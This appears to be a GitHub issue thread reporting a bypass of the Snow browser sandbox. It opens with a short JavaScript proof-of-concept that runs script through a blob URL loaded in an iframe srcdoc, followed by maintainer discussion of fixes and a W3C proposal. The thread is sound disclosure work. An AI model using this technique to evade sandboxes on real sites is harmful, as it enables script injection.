Snow can be bypassed with inline script

[terjanq]

var url = URL.createObjectURL(new Blob(['alert(window.origin)']))
var x = document.createElement('iframe');
x.srcdoc = `<script src="${url}"></script><meta http-equiv="refresh" content="0;">`
document.body.appendChild(x);

[deryilz]

At this point he should just disable iframe srcdoc. nobody actually uses it

[naugtur]

We have, just not sufficiently. See latest PR

[naugtur]

Thanks for contributing. The main maintainer of this project is temporary unavailable, but we'll definitely get back to this. The plan is to tighten some limitations on DOM usage that Snow already introduces and fixing the missing overrides where possible. Some of the work has started (see PR tab)

Meanwhile we're also working with W3C to propose a basic building block of Snow getting introduced into the browser so that all of the monkey-patching can be eliminated in the future. https://www.w3.org/2023/03/secure-the-web-forward/talks/realms.html

Feel free to update this issue with comments on how you think it should be addressed. We may reach out with questions later.

[weizman]

At this point he should just disable iframe srcdoc. nobody actually uses it

@deryilz The motivation behind Snow originally was to not limit anything the web offers, unless they are extra niece.

srcdoc is niece, but not that much. Before each version, I test Snow by injecting it to the top 20 websites in the world to see if it breaks anything.

Some of them, to my surprise, use srcdoc.

It has been afterwards decided to lose this attitude in favor of security (see https://weizmangal.com/2023/08/03/snow-stops-playing-nice/), srcdoc was dropped in some cases but not entirely. We should reconsider.